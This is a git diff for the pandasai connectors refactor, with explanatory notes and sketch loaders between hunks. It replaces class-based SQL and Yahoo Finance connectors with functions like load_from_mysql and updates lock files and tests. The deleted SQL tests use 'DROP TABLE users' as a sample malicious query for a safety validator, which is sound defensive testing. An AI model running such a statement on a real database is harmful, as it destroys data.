+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7559bce4b505762d737172556a4e6ea8a9998ecac1e39b5233465093e8cee697"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e8b58f0a96e7a1e341fc894f62c1177a7c83febebb5ff9123b579418fdc8a481"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6b269105e59ac96aba877c1707c600ae55711d9dcd3fc4b5012e4af68e30c648"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:79625966e176dc97ddabc142351e0409e28acf4660b88d1cf6adb876d20c490d"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:8aabf1c1a04584c168984ac678a668094d831f152859d06e055288fa515e4d30"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_ppc64le.whl", hash = "sha256:19721ac03892001ee8fdd11507e6a2e01f4e37014def96379411ca99d78aeb2c"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:7f5d859928e635fa3ce3477704acee0f667b3a3d3e4bb109f2b18d4005f38287"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-win32.whl", hash = "sha256:3216ccf953b3f267691c90c6fe742e45d890d8272326b4a8b20850a03d05b7b8"},
+ {file = "psycopg2_binary-2.9.10-cp39-cp39-win_amd64.whl", hash = "sha256:30e34c4e97964805f715206c7b789d54a78b70f3ff19fbe590104b71c45600e5"},
+]
+
[[package]]
name = "pydantic"
version = "2.9.2"
@@ -1350,6 +1437,21 @@ files = [
[package.dependencies]
typing-extensions = ">=4.6.0,<4.7.0 || >4.7.0"
+[[package]]
+name = "pymysql"
+version = "1.1.1"
+description = "Pure Python MySQL Driver"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "PyMySQL-1.1.1-py3-none-any.whl", hash = "sha256:4de15da4c61dc132f4fb9ab763063e693d521a80fd0e87943b9a453dd4c19d6c"},
+ {file = "pymysql-1.1.1.tar.gz", hash = "sha256:e127611aaf2b417403c60bf4dc570124aeb4a57f5f37b8e95ae399a42f904cd0"},
+]
+
+[package.extras]
+ed25519 = ["PyNaCl (>=1.4.0)"]
+rsa = ["cryptography"]
+
[[package]]
name = "pyparsing"
version = "3.2.0"
@@ -2294,4 +2396,4 @@ type = ["pytest-mypy"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<4.0"
-content-hash = "9297bb6278d2ca36ffab1fd12441ae41d39889e1fda1227215e8b722830cd67f"
+content-hash = "c1d69c6679692e0d196319b60a377fa734b3ff55aedadc1a092357f048d37e59"
diff --git a/extensions/connectors/sql/pyproject.toml b/extensions/connectors/sql/pyproject.toml
index 3ff99eefb..0549598c4 100644
--- a/extensions/connectors/sql/pyproject.toml
+++ b/extensions/connectors/sql/pyproject.toml
@@ -20,6 +20,12 @@ pytest = "^7.4.0"
pytest-cov = "^4.1.0"
pytest-mock = "^3.11.1"
+
+[tool.poetry.group.dev.dependencies]
+pymysql = "^1.1.1"
+psycopg2-binary = "^2.9.10"
+cockroachdb = "^0.3.5"
+
[build-system]
requires = ["poetry-core"]
build-backend = "poetry.core.masonry.api"
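The new dev-group drivers exist only to back the rewritten functional loader tests (they are also what changed the lock entries and content-hash above). For orientation, a minimal sketch of the loader shape those tests assert against; the shipped pandasai_sql implementation may differ in details:

import pandas as pd


def load_from_mysql(connection_info: dict, query: str) -> pd.DataFrame:
    # Lazy import keeps the driver an optional (dev-only) dependency;
    # the tests patch "pymysql.connect", which this call resolves.
    import pymysql

    conn = pymysql.connect(
        host=connection_info["host"],
        user=connection_info["user"],
        password=connection_info["password"],
        database=connection_info["database"],
        port=connection_info["port"],
    )
    return pd.read_sql(query, conn)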
diff --git a/extensions/connectors/sql/tests/test_sql.py b/extensions/connectors/sql/tests/test_sql.py
index 0853f2e27..0b5e78927 100644
--- a/extensions/connectors/sql/tests/test_sql.py
+++ b/extensions/connectors/sql/tests/test_sql.py
@@ -1,361 +1,149 @@
import unittest
-from unittest.mock import Mock, patch
-
+from unittest.mock import patch, MagicMock
import pandas as pd
+# The loader functions under test are provided by the pandasai_sql package
from pandasai_sql import (
- SQLConnector,
- SQLConnectorConfig,
load_from_mysql,
load_from_postgres,
+ load_from_sqlite,
+ load_from_cockroachdb,
)
-from pandasai_sql.sql import (
- PostgreSQLConnector,
- MySQLConnector,
-)
-from pandasai.exceptions import MaliciousQueryError
-
-
-class TestSQLConnector(unittest.TestCase):
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def setUp(self, mock_create_engine):
- # Create a mock engine and connection
- self.mock_engine = Mock()
- self.mock_connection = Mock()
- self.mock_engine.connect.return_value = self.mock_connection
- mock_create_engine.return_value = self.mock_engine
-
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- self.connector = SQLConnector(self.config)
-
- @patch("pandasai_sql.sql.SQLConnector._load_connector_config")
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_constructor_and_properties(
- self, mock_load_connector_config, mock_init_connection
- ):
- # Test constructor and properties
-
- self.assertEqual(self.connector.config.model_dump(), self.config)
- self.assertEqual(self.connector._engine, self.mock_engine)
- self.assertEqual(self.connector._connection, self.mock_connection)
- self.assertEqual(self.connector._cache_interval, 600)
- SQLConnector(self.config)
- mock_load_connector_config.assert_called()
- mock_init_connection.assert_called()
-
- def test_repr_method(self):
- # Test __repr__ method
- expected_repr = (
- ""
- )
- self.assertEqual(repr(self.connector), expected_repr)
-
- def test_build_query_method(self):
- # Test _build_query method
- query = self.connector._build_query(limit=5, order="RAND()")
- expected_query = """SELECT *
-FROM your_table
-WHERE column_name = :value_0 ORDER BY RAND() ASC
- LIMIT :param_1"""
- self.assertEqual(str(query), expected_query)
- @patch("pandasai_sql.sql.pd.read_sql", autospec=True)
- def test_head_method(self, mock_read_sql):
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_read_sql.return_value = expected_data
- head_data = self.connector.head()
- pd.testing.assert_frame_equal(head_data, expected_data)
-
- def test_rows_count_property(self):
- # Test rows_count property
- self.connector._rows_count = None
- self.mock_connection.execute.return_value.fetchone.return_value = (
- 50,
- ) # Sample rows count
- rows_count = self.connector.rows_count
- self.assertEqual(rows_count, 50)
-
- def test_columns_count_property(self):
- # Test columns_count property
- self.connector._columns_count = None
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- columns_count = self.connector.columns_count
- self.assertEqual(columns_count, 2)
-
- def test_column_hash_property(self):
- # Test column_hash property
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- column_hash = self.connector.column_hash
- self.assertIsNotNone(column_hash)
- self.assertEqual(
- column_hash,
- "ea6a80582b83e1511f8be83412b13e7b86d20c45b96fcf9731f3b99dc3b568aa",
+class TestDatabaseLoader(unittest.TestCase):
+ @patch("pymysql.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_mysql(self, mock_read_sql, mock_pymysql_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_pymysql_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [1, 2], "column2": [3, 4]}
)
- def test_fallback_name_property(self):
- # Test fallback_name property
- fallback_name = self.connector.fallback_name
- self.assertEqual(fallback_name, "your_table")
-
- def test_is_sql_query_safe_safe_query(self):
- safe_query = "SELECT * FROM users WHERE username = 'John'"
- result = self.connector._is_sql_query_safe(safe_query)
- assert result is True
-
- def test_is_sql_query_safe_malicious_query(self):
- malicious_query = "DROP TABLE users"
- result = self.connector._is_sql_query_safe(malicious_query)
- assert result is False
-
- @patch("pandasai_sql.sql.pd.read_sql", autospec=True)
- def test_execute_direct_sql_query_safe_query(self, mock_sql):
- safe_query = "SELECT * FROM users WHERE username = 'John'"
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_sql.return_value = expected_data
- result = self.connector.execute_direct_sql_query(safe_query)
- assert isinstance(result, pd.DataFrame)
-
- def test_execute_direct_sql_query_malicious_query(self):
- malicious_query = "DROP TABLE users"
- try:
- self.connector.execute_direct_sql_query(malicious_query)
- assert False, "MaliciousQueryError not raised"
- except MaliciousQueryError:
- pass
-
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_identical_configs(self, mock_init_connection):
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- connector_2 = SQLConnector(self.config)
-
- assert self.connector.equals(connector_2)
-
- @patch("pandasai_sql.sql.SQLConnector._load_connector_config")
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_different_configs(
- self, mock_load_connector_config, mock_init_connection
- ):
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username_differ",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- connector_2 = SQLConnector(self.config)
-
- assert not self.connector.equals(connector_2)
-
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_different_connector(self, mock_init_connection):
- # Define your ConnectorConfig instance here
- self.config = SQLConnectorConfig(
- dialect="postgresql",
- driver="psycopg2",
- username="your_username_differ",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of SQLConnector
- connector_2 = PostgreSQLConnector(self.config)
-
- assert not self.connector.equals(connector_2)
-
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_connector_type(self, mock_init_connection):
- # Define your ConnectorConfig instance here
- config = {
- "username": "your_username_differ",
- "password": "your_password",
- "host": "your_host",
- "port": 443,
- "database": "your_database",
- "table": "your_table",
- "where": [["column_name", "=", "value"]],
+ # Test data
+ connection_info = {
+ "host": "localhost",
+ "user": "root",
+ "password": "password",
+ "database": "test_db",
+ "port": 3306,
}
+ query = "SELECT * FROM test_table"
- # Create an instance of SQLConnector
- connector_2 = PostgreSQLConnector(config)
-
- assert connector_2.type == "postgresql"
+ result = load_from_mysql(connection_info, query)
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- def test_equals_sql_connector_type(self, mock_init_connection):
- # Define your ConnectorConfig instance here
+ # Assert that the connection is made and SQL query is executed
+ mock_pymysql_connect.assert_called_once_with(
+ host="localhost",
+ user="root",
+ password="password",
+ database="test_db",
+ port=3306,
+ )
+ mock_read_sql.assert_called_once_with(query, mock_conn)
+
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
+
+ @patch("psycopg2.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_postgres(self, mock_read_sql, mock_psycopg2_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_psycopg2_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [5, 6], "column2": [7, 8]}
+ )
- config = {
- "username": "your_username_differ",
- "password": "your_password",
- "host": "your_host",
- "port": 443,
- "database": "your_database",
- "table": "your_table",
- "where": [["column_name", "=", "value"]],
+ # Test data
+ connection_info = {
+ "host": "localhost",
+ "user": "postgres",
+ "password": "password",
+ "database": "test_db",
+ "port": 5432,
}
+ query = "SELECT * FROM test_table"
- # Create an instance of SQLConnector
- connector_2 = MySQLConnector(config)
-
- assert connector_2.type == "mysql"
+ result = load_from_postgres(connection_info, query)
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def test_connector_constructor_with_ssl_settings(self, create_engine_mock):
- config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- connect_args={"sslmode": "require", "sslrootcert": None},
- where=[["column_name", "=", "value"]],
- ).dict()
- SQLConnector(config)
- create_engine_mock.assert_called_with(
- "mysql+pymysql://your_username:your_password@your_host:443/your_database",
- connect_args={"sslmode": "require", "sslrootcert": None},
+ # Assert that the connection is made and SQL query is executed
+ mock_psycopg2_connect.assert_called_once_with(
+ host="localhost",
+ user="postgres",
+ password="password",
+ dbname="test_db",
+ port=5432,
)
-
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def test_connector_constructor_with_no_ssl_settings(self, create_engine_mock):
- config = SQLConnectorConfig(
- dialect="mysql",
- driver="pymysql",
- username="your_username",
- password="your_password",
- host="your_host",
- port=443,
- database="your_database",
- table="your_table",
- where=[["column_name", "=", "value"]],
- ).dict()
- SQLConnector(config)
- create_engine_mock.assert_called_with(
- "mysql+pymysql://your_username:your_password@your_host:443/your_database",
- connect_args={},
+ mock_read_sql.assert_called_once_with(query, mock_conn)
+
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
+
+ @patch("sqlite3.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_sqlite(self, mock_read_sql, mock_sqlite3_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_sqlite3_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [9, 10], "column2": [11, 12]}
)
- @patch("pandasai_sql.sql.SQLConnector._init_connection")
- @patch("pandasai_sql.sql.pd.read_sql")
- def test_equals_connector_execute_direct_sql(
- self, mock_read_sql, mock_init_connection
- ):
- # Define your ConnectorConfig instance here
- config = {
- "username": "your_username_differ",
- "password": "your_password",
- "host": "your_host",
- "port": 443,
- "database": "your_database",
- "table": "your_table",
- "where": [["column_name", "=", "value"]],
- }
+ # Test data
+ connection_info = {"database": "test_db.sqlite"}
+ query = "SELECT * FROM test_table"
- # Create an instance of SQLConnector
- connector_2 = PostgreSQLConnector(config)
+ result = load_from_sqlite(connection_info, query)
- connector_2.execute_direct_sql_query("SELECT * from `orders`")
+ # Assert that the connection is made and SQL query is executed
+ mock_sqlite3_connect.assert_called_once_with("test_db.sqlite")
+ mock_read_sql.assert_called_once_with(query, mock_conn)
- mock_read_sql.assert_called_once()
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
+ @patch("psycopg2.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_cockroachdb(self, mock_read_sql, mock_cockroachdb_connect):
+ # Setup the mock return values
+ mock_conn = MagicMock()
+ mock_cockroachdb_connect.return_value = mock_conn
+ mock_read_sql.return_value = pd.DataFrame(
+ {"column1": [13, 14], "column2": [15, 16]}
+ )
-class TestSQLLoaders(unittest.TestCase):
- def setUp(self):
- self.connection_info = {
+ # Test data
+ connection_info = {
"host": "localhost",
- "user": "testuser",
- "password": "testpass",
- "database": "testdb",
- "port": 3306,
+ "user": "root",
+ "password": "password",
+ "database": "test_db",
+ "port": 26257,
}
- self.query = "SELECT * FROM test_table"
-
- @patch("pandasai_sql.pd.read_sql")
- def test_load_from_mysql(self, mock_read_sql):
- mock_pymysql = Mock()
- mock_connection = Mock()
- mock_pymysql.connect.return_value = mock_connection
-
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
+ query = "SELECT * FROM test_table"
- with patch.dict("sys.modules", {"pymysql": mock_pymysql}):
- result = load_from_mysql(self.connection_info, self.query)
+ result = load_from_cockroachdb(connection_info, query)
- mock_pymysql.connect.assert_called_once_with(
- host=self.connection_info["host"],
- user=self.connection_info["user"],
- password=self.connection_info["password"],
- database=self.connection_info["database"],
- port=self.connection_info["port"],
+ # Assert that the connection is made and SQL query is executed
+ mock_cockroachdb_connect.assert_called_once_with(
+ host="localhost",
+ user="root",
+ password="password",
+ dbname="test_db",
+ port=26257,
)
- mock_read_sql.assert_called_once_with(self.query, mock_connection)
- pd.testing.assert_frame_equal(result, expected_df)
+ mock_read_sql.assert_called_once_with(query, mock_conn)
- @patch("pandasai_sql.pd.read_sql")
- def test_load_from_postgres(self, mock_read_sql):
- mock_psycopg2 = Mock()
- mock_connection = Mock()
- mock_psycopg2.connect.return_value = mock_connection
+ # Assert the result is a DataFrame
+ self.assertIsInstance(result, pd.DataFrame)
+ self.assertEqual(result.shape, (2, 2))
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
- with patch.dict("sys.modules", {"psycopg2": mock_psycopg2}):
- result = load_from_postgres(self.connection_info, self.query)
-
- mock_psycopg2.connect.assert_called_once_with(
- host=self.connection_info["host"],
- user=self.connection_info["user"],
- password=self.connection_info["password"],
- dbname=self.connection_info["database"],
- port=self.connection_info["port"],
- )
- mock_read_sql.assert_called_once_with(self.query, mock_connection)
- pd.testing.assert_frame_equal(result, expected_df)
+if __name__ == "__main__":
+ unittest.main()
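A note on test_load_from_cockroachdb: it patches psycopg2.connect rather than a CockroachDB-specific driver because CockroachDB speaks the PostgreSQL wire protocol. Under that assumption, a loader consistent with the test's assertions is small:

import pandas as pd
import psycopg2


def load_from_cockroachdb(connection_info: dict, query: str) -> pd.DataFrame:
    # CockroachDB reuses the Postgres driver; only the conventional
    # port (26257 in the test) differs from vanilla Postgres.
    conn = psycopg2.connect(
        host=connection_info["host"],
        user=connection_info["user"],
        password=connection_info["password"],
        dbname=connection_info["database"],
        port=connection_info["port"],
    )
    return pd.read_sql(query, conn)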
diff --git a/extensions/connectors/sql/tests/test_sql_connector.py b/extensions/connectors/sql/tests/test_sql_connector.py
deleted file mode 100644
index 91bd459e3..000000000
--- a/extensions/connectors/sql/tests/test_sql_connector.py
+++ /dev/null
@@ -1,36 +0,0 @@
-"""Unit tests for SQL connector"""
-
-import pytest
-from unittest.mock import MagicMock
-from pandasai.agent import Agent
-from pandasai.exceptions import InvalidConfigError
-
-
-class TestSQLConnector:
- """Unit tests for SQL connector"""
-
- @pytest.fixture
- def sql_connector(self):
- mock_connector = MagicMock()
- mock_connector.type = "sql"
- mock_connector.get_table_names.return_value = ["table1", "table2"]
- return mock_connector
-
- @pytest.fixture
- def pgsql_connector(self):
- mock_connector = MagicMock()
- mock_connector.type = "postgresql"
- mock_connector.get_table_names.return_value = ["table3", "table4"]
- return mock_connector
-
- def test_validate_multiple_sql_connectors(self, sql_connector, pgsql_connector):
- """Test that agent raises an error when initialized with multiple SQL connectors"""
- llm = MagicMock()
- llm.type = "fake"
-
- with pytest.raises(InvalidConfigError):
- Agent(
- [sql_connector, pgsql_connector],
- {"llm": llm, "direct_sql": False},
- vectorstore=MagicMock(),
- )
diff --git a/extensions/connectors/sql/tests/test_sqlite.py b/extensions/connectors/sql/tests/test_sqlite.py
deleted file mode 100644
index b94089b87..000000000
--- a/extensions/connectors/sql/tests/test_sqlite.py
+++ /dev/null
@@ -1,113 +0,0 @@
-import unittest
-from unittest.mock import Mock, patch
-
-import pandas as pd
-
-from pandasai_sql.sql import (
- SqliteConnector,
- SqliteConnectorConfig,
-)
-
-
-class TestSqliteConnector(unittest.TestCase):
- @patch("pandasai_sql.sql.create_engine", autospec=True)
- def setUp(self, mock_create_engine) -> None:
- self.mock_engine = Mock()
- self.mock_connection = Mock()
- self.mock_engine.connect.return_value = self.mock_connection
- mock_create_engine.return_value = self.mock_engine
-
- self.config = SqliteConnectorConfig(
- dialect="sqlite", database="path_todb.db", table="yourtable"
- ).dict()
-
- self.connector = SqliteConnector(self.config)
-
- @patch("pandasai_sql.sql.SqliteConnector._load_connector_config")
- @patch("pandasai_sql.sql.SqliteConnector._init_connection")
- def test_constructor_and_properties(
- self, mock_load_connector_config, mock_init_connection
- ):
- # Test constructor and properties
- self.assertEqual(self.connector.config.model_dump(), self.config)
- self.assertEqual(self.connector._engine, self.mock_engine)
- self.assertEqual(self.connector._connection, self.mock_connection)
- self.assertEqual(self.connector._cache_interval, 600)
- SqliteConnector(self.config)
- mock_load_connector_config.assert_called()
- mock_init_connection.assert_called()
-
- def test_repr_method(self):
- # Test __repr__ method
- expected_repr = (
- ""
- )
- self.assertEqual(repr(self.connector), expected_repr)
-
- @patch("pandasai_sql.sql.pd.read_sql", autospec=True)
- def test_head_method(self, mock_read_sql):
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_read_sql.return_value = expected_data
- head_data = self.connector.head()
- pd.testing.assert_frame_equal(head_data, expected_data)
-
- def test_rows_count_property(self):
- # Test rows_count property
- self.connector._rows_count = None
- self.mock_connection.execute.return_value.fetchone.return_value = (
- 50,
- ) # Sample rows count
- rows_count = self.connector.rows_count
- self.assertEqual(rows_count, 50)
-
- def test_columns_count_property(self):
- # Test columns_count property
- self.connector._columns_count = None
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- columns_count = self.connector.columns_count
- self.assertEqual(columns_count, 2)
-
- def test_column_hash_property(self):
- # Test column_hash property
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- column_hash = self.connector.column_hash
- self.assertIsNotNone(column_hash)
- self.assertEqual(
- column_hash,
- "0d045cff164deef81e24b0ed165b7c9c2789789f013902115316cde9d214fe63",
- )
-
- def test_fallback_name_property(self):
- # Test fallback_name property
- fallback_name = self.connector.fallback_name
- self.assertEqual(fallback_name, "yourtable")
-
- @patch("pandasai_sql.sql.SqliteConnector._init_connection")
- def test_two_connector_equal(self, mock_init_connection):
- conn1 = SqliteConnector(self.config)
-
- conn2 = SqliteConnector(self.config)
-
- assert conn1.equals(conn2)
-
- config2 = SqliteConnectorConfig(
- dialect="sqlite", database="path_todb.db", table="different_table"
- ).dict()
- conn3 = SqliteConnector(config2)
-
- assert conn1.equals(conn3)
-
- @patch("pandasai_sql.sql.SqliteConnector._init_connection")
- def test_two_connector_not_equal(self, mock_init_connection):
- conn1 = SqliteConnector(self.config)
-
- config2 = SqliteConnectorConfig(
- dialect="sqlite", database="path_todb2.db", table="yourtable"
- ).dict()
- conn3 = SqliteConnector(config2)
-
- assert not conn1.equals(conn3)
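The deleted class-based SqliteConnector tests are superseded by test_load_from_sqlite in test_sql.py above. A sketch of the functional replacement those tests imply, assuming the stdlib driver:

import sqlite3

import pandas as pd


def load_from_sqlite(connection_info: dict, query: str) -> pd.DataFrame:
    # sqlite3 needs only a database path; no credentials or port.
    conn = sqlite3.connect(connection_info["database"])
    return pd.read_sql(query, conn)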
diff --git a/extensions/connectors/yfinance/pandasai_yfinance/__init__.py b/extensions/connectors/yfinance/pandasai_yfinance/__init__.py
index 31671b34d..c5ceede71 100644
--- a/extensions/connectors/yfinance/pandasai_yfinance/__init__.py
+++ b/extensions/connectors/yfinance/pandasai_yfinance/__init__.py
@@ -1,11 +1,10 @@
-from .yahoo_finance import YahooFinanceConnector
-
def load_from_yahoo_finance(connection_info, query):
import yfinance as yf
-
+
ticker = yf.Ticker(connection_info["ticker"])
data = ticker.history(period=connection_info.get("period", "1mo"))
-
+
return data.to_csv(index=True)
-__all__ = ["YahooFinanceConnector"]
\ No newline at end of file
+
+__all__ = ["load_from_yahoo_finance"]
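Unlike the SQL loaders, load_from_yahoo_finance returns a CSV string (data.to_csv(index=True)) rather than a DataFrame, and it ignores its query argument. A usage sketch (requires network access; ticker and period values are illustrative):

from pandasai_yfinance import load_from_yahoo_finance

csv_data = load_from_yahoo_finance({"ticker": "AAPL", "period": "5d"}, query="")
print(csv_data.splitlines()[0])  # header row, e.g. "Date,Open,High,Low,Close,..."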
diff --git a/extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py b/extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py
deleted file mode 100644
index 173e688a8..000000000
--- a/extensions/connectors/yfinance/pandasai_yfinance/yahoo_finance.py
+++ /dev/null
@@ -1,199 +0,0 @@
-import hashlib
-import os
-import time
-from typing import Optional, Union
-
-import pandas as pd
-
-from pandasai.constants import DEFAULT_FILE_PERMISSIONS
-from pandasai.helpers.path import find_project_root
-from pandasai.connectors.base import BaseConnector, BaseConnectorConfig
-
-
-class YahooFinanceConnectorConfig(BaseConnectorConfig):
- """
- Connector configuration for Yahoo Finance.
- """
-
- dialect: str = "yahoo_finance"
- host: str = "yahoo.finance.com"
- database: str = "stock_data"
- host: str
-
-
-class YahooFinanceConnector(BaseConnector):
- """
- Yahoo Finance connector for retrieving stock data.
- """
-
- _cache_interval: int = 600 # 10 minutes
-
- def __init__(
- self,
- stock_ticker: Optional[str] = None,
- config: Optional[Union[YahooFinanceConnectorConfig, dict]] = None,
- cache_interval: int = 600,
- **kwargs,
- ):
- if not stock_ticker and not config:
- raise ValueError(
- "You must specify either a stock ticker or a config object."
- )
-
- try:
- import yfinance
- except ImportError as e:
- raise ImportError(
- "Could not import yfinance python package. "
- "Please install it with `pip install yfinance`."
- ) from e
-
- if not isinstance(config, YahooFinanceConnectorConfig):
- if not config:
- config = {}
-
- if stock_ticker:
- config["table"] = stock_ticker
-
- yahoo_finance_config = YahooFinanceConnectorConfig(**config)
- else:
- yahoo_finance_config = config
-
- self._cache_interval = cache_interval
- super().__init__(yahoo_finance_config)
- self.ticker = yfinance.Ticker(self.config.table)
-
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Return the head of the data source that the connector is connected to.
-
- Returns:
- DataFrame: The head of the data source that the connector is connected to.
- connected to.
- """
- return self.ticker.history(period=f"{n}d")
-
- def _get_cache_path(self, include_additional_filters: bool = False):
- """
- Return the path of the cache file.
-
- Returns:
- str: The path of the cache file.
- """
- cache_dir = os.path.join(os.getcwd(), "")
- try:
- cache_dir = os.path.join((find_project_root()), "cache")
- except ValueError:
- cache_dir = os.path.join(os.getcwd(), "cache")
-
- return os.path.join(cache_dir, f"{self.config.table}_data.parquet")
-
- def _get_cache_path(self):
- """
- Return the path of the cache file for Yahoo Finance data.
- """
- try:
- cache_dir = os.path.join((find_project_root()), "cache")
- except ValueError:
- cache_dir = os.path.join(os.getcwd(), "cache")
-
- os.makedirs(cache_dir, mode=DEFAULT_FILE_PERMISSIONS, exist_ok=True)
-
- return os.path.join(cache_dir, f"{self.config.table}_data.parquet")
-
- def _cached(self):
- """
- Return the cached Yahoo Finance data if it exists and is not older than the
- cache interval.
-
- Returns:
- DataFrame|None: The cached data if it exists and is not older than the cache
- interval, None otherwise.
- """
- cache_path = self._get_cache_path()
- if not os.path.exists(cache_path):
- return None
-
- # If the file is older than 1 day, delete it
- if os.path.getmtime(cache_path) < time.time() - self._cache_interval:
- if self.logger:
- self.logger.log(f"Deleting expired cached data from {cache_path}")
- os.remove(cache_path)
- return None
-
- if self.logger:
- self.logger.log(f"Loading cached data from {cache_path}")
-
- return cache_path
-
- def execute(self):
- """
- Execute the connector and return the result.
-
- Returns:
- DataFrame: The result of the connector.
- """
- if cached_path := self._cached():
- return pd.read_parquet(cached_path)
-
- # Use yfinance to retrieve historical stock data
- stock_data = self.ticker.history(period="max")
-
- # Save the result to the cache
- stock_data.to_parquet(self._get_cache_path())
-
- return stock_data
-
- @property
- def rows_count(self):
- """
- Return the number of rows in the data source that the connector is
- connected to.
-
- Returns:
- int: The number of rows in the data source that the connector is
- connected to.
- """
- stock_data = self.execute()
- return len(stock_data)
-
- @property
- def columns_count(self):
- """
- Return the number of columns in the data source that the connector is
- connected to.
-
- Returns:
- int: The number of columns in the data source that the connector is
- connected to.
- """
- stock_data = self.execute()
- return len(stock_data.columns)
-
- @property
- def column_hash(self):
- """
- Return the hash code that is unique to the columns of the data source
- that the connector is connected to.
-
- Returns:
- int: The hash code that is unique to the columns of the data source
- that the connector is connected to.
- """
- stock_data = self.execute()
- columns_str = "|".join(stock_data.columns)
- return hashlib.sha256(columns_str.encode("utf-8")).hexdigest()
-
- @property
- def fallback_name(self):
- """
- Return the fallback name of the connector.
-
- Returns:
- str: The fallback name of the connector.
- """
- return self.config.table
-
- @property
- def pandas_df(self):
- return self.execute()
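Dropping the connector also drops its parquet cache. For reference, the core of the removed mtime-based expiry pattern, should a caller want to reinstate it around the new functional loader:

import os
import time

import pandas as pd


def read_cached_parquet(path: str, max_age_s: int = 600):
    """Return the cached frame if it exists and is younger than max_age_s."""
    if os.path.exists(path) and os.path.getmtime(path) >= time.time() - max_age_s:
        return pd.read_parquet(path)
    return None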
diff --git a/extensions/connectors/yfinance/tests/test_yahoo_finance.py b/extensions/connectors/yfinance/tests/test_yahoo_finance.py
index c65437ba5..9d2f79d61 100644
--- a/extensions/connectors/yfinance/tests/test_yahoo_finance.py
+++ b/extensions/connectors/yfinance/tests/test_yahoo_finance.py
@@ -1,148 +1,51 @@
-from unittest.mock import Mock, patch
-
+import unittest
+from unittest.mock import patch, MagicMock
import pandas as pd
-import pytest
-import yfinance as yf
-from pandasai_yfinance.yahoo_finance import YahooFinanceConnector
+# The loader function under test is provided by the pandasai_yfinance package
from pandasai_yfinance import load_from_yahoo_finance
-@pytest.fixture
-def stock_ticker():
- return "AAPL"
-
-
-@pytest.fixture
-def config():
- return {"where": [["column1", "=", "value1"], ["column2", ">", "value2"]]}
-
-
